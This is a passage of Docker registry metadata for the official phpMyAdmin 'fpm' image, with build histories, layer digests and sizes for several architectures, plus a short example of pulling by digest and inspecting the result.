awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 07:52:09 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 07:52:12 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 07:52:13 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 07:52:14 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 07:52:17 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 07:52:17 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 07:52:20 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 07:52:21 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 04:17:05 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 04:17:07 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 04:17:08 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 04:17:09 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 04:17:13 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 04:17:14 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 04:17:15 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 04:17:17 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 04:17:17 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 04:17:50 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 04:17:54 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 04:17:55 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 04:17:57 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 04:17:58 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:ee0a2cc24f2963b99b1d30dc2613f196b7c9e38337cf99332d6c4efe07f01ef2`
Last Modified: Tue, 30 Mar 2021 23:16:25 GMT
Size: 22.7 MB (22739814 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6902379d71a94188d5c60681ae18bd9f9fa097906a99e027038263140fa89950`
Last Modified: Wed, 31 Mar 2021 08:31:33 GMT
Size: 226.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d113a588066812e435718c64d9b2879309ea88c6fe5f5b398b8231cc96bd2611`
Last Modified: Wed, 31 Mar 2021 08:31:55 GMT
Size: 59.5 MB (59512371 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:06d469e8c06518630db4bbc7bb2aeca23cd234ab4a06f2907ca2b721a2336f86`
Last Modified: Wed, 31 Mar 2021 08:31:32 GMT
Size: 269.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0b7e19bf54addb343fa2ba79bfa2555662f4fdf809770d8f7573b97fd3601f54`
Last Modified: Wed, 31 Mar 2021 08:35:06 GMT
Size: 10.7 MB (10654281 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:fda17693662fcacee7caeaa999cb1cd78350a1d5a11c800ed265d1acb41f69b6`
Last Modified: Wed, 31 Mar 2021 08:35:03 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:777eea881005d5ded6dcb3e9fcbdd24b7e05e1bff209c3db2216d5ea74c21aac`
Last Modified: Wed, 31 Mar 2021 08:35:12 GMT
Size: 26.2 MB (26200688 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:57e336485d3c190e697f2cf90ec08887782cfd576cb3a5f2ae67fca58e7b2198`
Last Modified: Wed, 31 Mar 2021 08:35:03 GMT
Size: 2.3 KB (2270 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9b89842c784ec5ce9eb39f17a0f15f5dedd7e40f400f74a25ab145c6eda2afd9`
Last Modified: Wed, 31 Mar 2021 08:35:04 GMT
Size: 247.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:efec1292d352b2e322ae0b0bd64ae6901e909809d4e327253dffb0bc3979b760`
Last Modified: Wed, 31 Mar 2021 08:35:06 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:59d90ebfe4aeae9bc82ee6010e1530fd33312d51a53c84c261f24a07540aea0e`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 2.5 MB (2496920 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2fb275c5f72ad5b36a59f0f9ea87c43ba2c1b0561ef5e22efdf29b1a083f2384`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 546.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2f1eb993f34a773b4660c9a891c5b59537d295b02df789cdd4b422b5f22245fd`
Last Modified: Thu, 01 Apr 2021 04:19:09 GMT
Size: 14.1 MB (14064148 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:49148a65116b7a89e286bf6f1a4c4a093324a1493f2fa727519de44dd01f8ac0`
Last Modified: Thu, 01 Apr 2021 04:19:01 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c1a420768bbbaa6ff94992e39b838ef865b1b6448f27e9a1bffb03445c947073`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; arm64 variant v8
```console
$ docker pull phpmyadmin@sha256:2ae7220d85686481ba3f282371c03ff5ddcc187f426899ee3c1e0048717c5bba
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **152.2 MB (152150723 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:be2eafa5472cfc0a822c85bcb81eec6c94204ac809af4bad1386dcfb42700fc8`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:47:15 GMT
ADD file:a9b57ded2400fc7f60ea40e5ccdd3e9bf0f72acfcc47223ceb66b4fa16955059 in /
# Tue, 30 Mar 2021 21:47:16 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 06:00:41 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 06:00:43 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 06:01:18 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 06:01:20 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 06:01:23 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 06:10:37 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 06:10:38 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 06:10:39 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 06:10:40 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 06:25:24 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 06:25:25 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 06:25:25 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 06:25:26 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 06:25:46 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 06:25:47 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 06:29:00 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 06:29:02 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 06:29:05 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 06:29:06 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 06:29:07 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 06:29:10 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 06:29:11 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 06:29:12 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 06:29:13 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 07:22:32 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 07:22:34 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 07:22:35 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 07:22:36 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 07:22:39 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 07:22:40 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 07:22:41 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 07:22:43 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 07:22:44 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 07:23:09 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 07:23:12 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 07:23:13 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 07:23:15 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 07:23:16 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:6fcf2156bc23db75595b822b865fbc962ed6f4521dec8cae509e66742a6a5ad3`
Last Modified: Tue, 30 Mar 2021 21:54:27 GMT
Size: 25.9 MB (25904513 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae1d497f4e5ea580a3a4b8a826f8c71379d6e7a76bd10d45f32adbac91f61cb2`
Last Modified: Wed, 31 Mar 2021 07:09:33 GMT
Size: 226.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7b603f7372a2390997a547c017682bbccabf5f4ff2e17c5a7ad87a6ece073a18`
Last Modified: Wed, 31 Mar 2021 07:10:00 GMT
Size: 70.4 MB (70355229 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b0372695364ccf5f16a3ecfb0185b21a24a456e1867b911685b0a4288ad4b313`
Last Modified: Wed, 31 Mar 2021 07:09:33 GMT
Size: 271.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a6102fb158490ba1c6742944504a179df99068d74a0834a4fcb60b2cb06a4070`
Last Modified: Wed, 31 Mar 2021 07:13:06 GMT
Size: 10.7 MB (10655139 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c36bdb0bbdcbbf5cbfb2008f47034c81f0a3976b4e31c0ebeb60bc9ea88bed04`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 493.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3b0e6ff5b63c805b42755f36262309e873aebd4bf5df2733c9d1401cbc3757d0`
Last Modified: Wed, 31 Mar 2021 07:13:12 GMT
Size: 28.3 MB (28334435 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b82b3dfaa5654b6c88b4c3b50a315248699063f78176d3262d60b856395faf24`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 2.3 KB (2271 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4f05ad8490526e74f3f5d03c95ae786282c6a0de4f57b8fad2088459c7b5a92f`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9ceea2e2edbba463b34b11daa2639178a11bd541e761d683ad165464daa2063f`
Last Modified: Wed, 31 Mar 2021 07:13:03 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0b027dbc53137e3fc12b36d210026c548dc0654808757db78537128584e2cfe6`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 2.8 MB (2821769 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e43fc57d2e294e501b706fd071d1d83e862a0a73bae4f141e0fdaf8356a3e1e9`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:af11c75f444a3d70769a52e28e5ccea84267eab9b6d4d2300896b5c971976e00`
Last Modified: Thu, 01 Apr 2021 07:24:13 GMT
Size: 14.1 MB (14064835 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:afc4d77dedc706925a5799756cf4c7bf5390760c75b9a0b4974cceda5102bc2d`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3e2ee7bf22831e08ad01941197b60358df44b7df96869b5ff9b49e58ef0e3232`
Last Modified: Thu, 01 Apr 2021 07:24:06 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
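
Because the `fpm` tag moves as new images are published, the per-section digest is the stable way to refer to exactly this arm64 build. A small sketch: pull by the digest shown at the top of this section, then confirm what arrived (the reported ID should match the Image ID listed above):

```console
$ docker pull phpmyadmin@sha256:2ae7220d85686481ba3f282371c03ff5ddcc187f426899ee3c1e0048717c5bba
$ docker image inspect --format '{{.Id}} {{.Architecture}}' \
>     phpmyadmin@sha256:2ae7220d85686481ba3f282371c03ff5ddcc187f426899ee3c1e0048717c5bba
```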
### `phpmyadmin:fpm` - linux; 386
```console
$ docker pull phpmyadmin@sha256:ac0b7cba6fbf40c57bb1a34146b0d5d2a158d749eecfcf57e55d3aa82ed95fc2
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **165.9 MB (165908612 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:bef0c7937a386956b292a4840b3dc453e5c26b1bc8dc616b592e827ececc5223`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:39:48 GMT
ADD file:d11c47560c0a88a83a3a0ce5af82fc17a07075e877293e4f922f126959810ea3 in /
# Tue, 30 Mar 2021 21:39:49 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 05:38:43 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 05:38:43 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 05:39:07 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 05:39:07 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 05:39:08 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 05:50:24 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 05:50:25 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 05:50:25 GMT
